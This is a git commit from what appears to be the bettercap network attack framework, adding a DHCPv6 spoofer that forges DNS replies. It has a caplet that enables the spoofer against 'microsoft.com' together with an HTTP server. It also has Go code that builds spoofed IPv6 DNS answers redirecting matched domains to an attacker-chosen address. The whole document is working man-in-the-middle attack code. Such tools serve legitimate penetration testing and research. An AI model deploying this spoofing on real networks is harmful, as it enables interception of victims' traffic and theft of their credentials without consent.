new: dhcp6 spoofer

This commit is contained in:
evilsocket 2018-01-12 23:25:55 +01:00
commit 659762c0ad
3 changed files with 84 additions and 3 deletions

View file

@ -1,8 +1,11 @@
# custom prompt for ipv6 ... this is cool, i know :)
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
net.recon on
dhcp6.spoof on
set dhcp6.spoof.domain microsoft.com
set http.server.path caplets/www
net.recon on
http.server on
dhcp6.spoof on
events.clear
clear

View file

@ -29,6 +29,7 @@ type DHCP6Spoofer struct {
DUID *dhcp6opts.DUIDLLT
DUIDRaw []byte
Domain string
Address net.IP
}
func NewDHCP6Spoofer(s *session.Session) *DHCP6Spoofer {
@ -42,6 +43,11 @@ func NewDHCP6Spoofer(s *session.Session) *DHCP6Spoofer {
``,
"Domain name to spoof."))
spoof.AddParam(session.NewStringParameter("dhcp6.spoof.address",
session.ParamIfaceAddress,
`^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$`,
"IP address to map the domain to."))
spoof.AddHandler(session.NewModuleHandler("dhcp6.spoof on", "",
"Start the DHCPv6 spoofer in the background.",
func(args []string) error {
@ -71,6 +77,7 @@ func (s DHCP6Spoofer) Author() string {
func (s *DHCP6Spoofer) Configure() error {
var err error
var addr string
if s.Handle, err = pcap.OpenLive(s.Session.Interface.Name(), 65536, true, pcap.BlockForever); err != nil {
return err
@ -85,6 +92,12 @@ func (s *DHCP6Spoofer) Configure() error {
return err
}
if err, addr = s.StringParam("dhcp6.spoof.address"); err != nil {
return err
}
s.Address = net.ParseIP(addr)
if s.DUID, err = dhcp6opts.NewDUIDLLT(1, time.Date(2000, time.January, 1, 0, 0, 0, 0, time.UTC), s.Session.Interface.HW); err != nil {
return err
} else if s.DUIDRaw, err = s.DUID.MarshalBinary(); err != nil {
@ -341,6 +354,70 @@ func (s *DHCP6Spoofer) dhcpReply(toType string, pkt gopacket.Packet, req dhcp6.P
}
}
func (s *DHCP6Spoofer) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp *layers.UDP, domain string, req *layers.DNS, target net.HardwareAddr) {
redir := fmt.Sprintf("(->%s)", s.Address)
if t, found := s.Session.Targets.Targets[target.String()]; found == true {
log.Info("Sending spoofed DNS reply for %s %s to %s.", core.Red(domain), core.Dim(redir), core.Bold(t.String()))
} else {
log.Info("Sending spoofed DNS reply for %s %s to %s.", core.Red(domain), core.Dim(redir), core.Bold(target.String()))
}
pip := pkt.Layer(layers.LayerTypeIPv6).(*layers.IPv6)
eth := layers.Ethernet{
SrcMAC: peth.DstMAC,
DstMAC: target,
EthernetType: layers.EthernetTypeIPv6,
}
ip6 := layers.IPv6{
Version: 6,
NextHeader: layers.IPProtocolUDP,
HopLimit: 64,
SrcIP: pip.DstIP,
DstIP: pip.SrcIP,
}
udp := layers.UDP{
SrcPort: pudp.DstPort,
DstPort: pudp.SrcPort,
}
udp.SetNetworkLayerForChecksum(&ip6)
answers := make([]layers.DNSResourceRecord, 0)
for _, q := range req.Questions {
answers = append(answers,
layers.DNSResourceRecord{
Name: []byte(q.Name),
Type: q.Type,
Class: q.Class,
TTL: 1024,
IP: s.Address,
})
}
dns := layers.DNS{
ID: req.ID,
QR: true,
OpCode: layers.DNSOpCodeQuery,
QDCount: req.QDCount,
Questions: req.Questions,
Answers: answers,
}
err, raw := packets.Serialize(&eth, &ip6, &udp, &dns)
if err != nil {
log.Error("Error serializing packet: %s.", err)
return
}
log.Debug("Sending %d bytes of packet ...", len(raw))
if err := s.Session.Queue.Send(raw); err != nil {
log.Error("Error sending packet: %s", err)
}
}
func (s *DHCP6Spoofer) onPacket(pkt gopacket.Packet) {
var dhcp dhcp6.Packet
var err error
@ -382,7 +459,8 @@ func (s *DHCP6Spoofer) onPacket(pkt gopacket.Packet) {
for _, q := range dns.Questions {
qName := string(q.Name)
if strings.HasSuffix(qName, s.Domain) == true {
log.Info("Spoofing domain %s", core.Red(qName))
s.dnsReply(pkt, eth, udp, qName, dns, eth.SrcMAC)
break
} else {
log.Debug("Skipping domain %s", qName)
}